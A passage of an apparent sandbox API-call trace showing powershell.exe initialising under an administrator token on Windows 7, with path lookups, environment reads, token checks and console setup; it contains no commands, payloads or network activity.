lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.010] GetLastError () returned 0x2 [0074.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.011] GetLastError () returned 0x2 [0074.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.056] GetLastError () returned 0xcb [0074.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae228, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.056] GetLastError () returned 0xcb [0074.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.057] GetLastError () returned 0xcb [0074.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.057] GetLastError () returned 0xcb [0074.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.066] GetLastError () returned 0xcb [0074.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xae16c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0074.139] GetLastError () returned 0x2 [0074.139] SetErrorMode (uMode=0x1) returned 0x1 [0074.139] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xae614 | out: lpFileInformation=0xae614*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0074.139] GetLastError () returned 0x2 [0074.139] SetErrorMode (uMode=0x1) returned 0x1 [0074.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae228, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.276] GetLastError () returned 0x0 [0074.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.276] GetLastError () returned 0x0 [0074.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.277] GetLastError () returned 0x0 [0074.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.280] GetLastError () returned 0xcb [0074.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.284] GetLastError () returned 0xcb [0074.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.284] GetLastError () returned 0xcb [0074.288] CoCreateGuid (in: pguid=0xae6f4 | out: pguid=0xae6f4*(Data1=0xcf5aae17, Data2=0x129, Data3=0x47b3, Data4=([0]=0x9c, [1]=0x61, [2]=0xd8, [3]=0xe8, [4]=0x6c, [5]=0xf3, [6]=0xdf, [7]=0x54))) returned 0x0 [0074.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.294] GetLastError () returned 0xcb [0074.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.297] GetLastError () returned 0xcb [0074.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.299] GetLastError () returned 0xcb [0074.308] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0074.308] GetLastError () returned 0x0 [0074.310] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xae5d4 | out: lpConsoleScreenBufferInfo=0xae5d4) returned 1 [0074.310] GetLastError () returned 0x0 [0074.315] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0074.315] GetLastError () returned 0x0 [0074.315] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xae5d4 | out: lpConsoleScreenBufferInfo=0xae5d4) returned 1 [0074.315] GetLastError () returned 0x0 [0074.316] GetVersionExW (in: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54b648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.316] GetLastError () returned 0x0 [0074.317] GetCurrentProcess () returned 0xffffffff [0074.317] GetLastError () returned 0x3f0 [0074.318] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xae5e4 | out: TokenHandle=0xae5e4*=0x34c) returned 1 [0074.318] GetLastError () returned 0x3f0 [0074.322] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xae63c | out: TokenInformation=0x0, ReturnLength=0xae63c) returned 0 [0074.322] GetLastError () returned 0x7a [0074.323] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x573ab8 [0074.323] GetLastError () returned 0x7a [0074.323] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x573ab8, TokenInformationLength=0x4, ReturnLength=0xae63c | out: TokenInformation=0x573ab8, ReturnLength=0xae63c) returned 1 [0074.323] GetLastError () returned 0x7a [0074.325] DuplicateTokenEx (in: hExistingToken=0x34c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xae5f4 | out: phNewToken=0xae5f4*=0x344) returned 1 [0074.326] GetLastError () returned 0x7f [0074.326] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xae63c | out: TokenInformation=0x0, ReturnLength=0xae63c) returned 0 [0074.326] GetLastError () returned 0x7a [0074.326] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x573a98 [0074.326] GetLastError () returned 0x7a [0074.326] GetTokenInformation (in: TokenHandle=0x34c, TokenInformationClass=0x8, TokenInformation=0x573a98, TokenInformationLength=0x4, ReturnLength=0xae63c | out: TokenInformation=0x573a98, ReturnLength=0xae63c) returned 1 [0074.326] GetLastError () returned 0x7a [0074.327] CheckTokenMembership (in: TokenHandle=0x344, SidToCheck=0x2ae9258*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xae5d0 | out: IsMember=0xae5d0) returned 1 [0074.327] GetLastError () returned 0x7a [0074.327] CloseHandle (hObject=0x344) returned 1 [0074.327] GetLastError () returned 0x7a [0074.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.327] GetLastError () returned 0x7a [0074.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.327] GetLastError () returned 0x7a [0074.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.327] GetLastError () returned 0x7a [0074.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.327] GetLastError () returned 0x7a [0074.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.372] GetLastError () returned 0x7a [0074.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.372] GetLastError () returned 0x7a [0074.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae094, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.372] GetLastError () returned 0x7a [0074.381] GetConsoleTitleW (in: lpConsoleTitle=0x55d940, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0074.381] GetLastError () returned 0x7a [0074.404] GetConsoleTitleW (in: lpConsoleTitle=0x55d940, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0074.404] GetLastError () returned 0x7a [0074.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.404] GetLastError () returned 0x7a [0074.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.404] GetLastError () returned 0x7a [0074.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae08c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.404] GetLastError () returned 0x7a [0074.409] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0074.410] GetLastError () returned 0x7a [0074.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.410] GetLastError () returned 0x7a [0074.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.410] GetLastError () returned 0x7a [0074.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.410] GetLastError () returned 0x7a [0074.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.410] GetLastError () returned 0x7a [0074.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.450] GetLastError () returned 0x7a [0074.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.450] GetLastError () returned 0x7a [0074.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.450] GetLastError () returned 0x7a [0074.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.451] GetLastError () returned 0x7a [0074.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.451] GetLastError () returned 0x7a [0074.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.451] GetLastError () returned 0x7a [0074.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae128, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.451] GetLastError () returned 0x7a [0074.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.451] GetLastError () returned 0x7a [0074.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.451] GetLastError () returned 0x7a [0074.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae0d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.451] GetLastError () returned 0x7a [0074.512] SetConsoleCtrlHandler (HandlerRoutine=0x290384a, Add=1) returned 1 [0074.512] GetLastError () returned 0x7a [0074.533] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344 [0074.533] GetLastError () returned 0x0 [0074.535] CoCreateGuid (in: pguid=0xae608 | out: pguid=0xae608*(Data1=0x19a9a0e2, Data2=0x8d69, Data3=0x4298, Data4=([0]=0xa2, [1]=0xb6, [2]=0xca, [3]=0xc6, [4]=0x23, [5]=0xfe, [6]=0x56, [7]=0xcb))) returned 0x0 [0074.578] WinSqmIsOptedIn () returned 0x0 [0074.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.579] GetLastError () returned 0xcb [0074.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.586] GetLastError () returned 0xcb [0074.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.587] GetLastError () returned 0xcb [0074.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.589] GetLastError () returned 0xcb [0074.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.590] GetLastError () returned 0xcb [0074.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.594] GetLastError () returned 0xcb [0074.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.595] GetLastError () returned 0xcb [0074.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.596] GetLastError () returned 0xcb [0074.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.600] GetLastError () returned 0xcb [0074.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.610] GetLastError () returned 0xcb [0074.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.611] GetLastError () returned 0xcb [0074.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.612] GetLastError () returned 0xcb [0074.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.915] GetLastError () returned 0xcb [0074.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.915] GetLastError () returned 0xcb [0074.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: 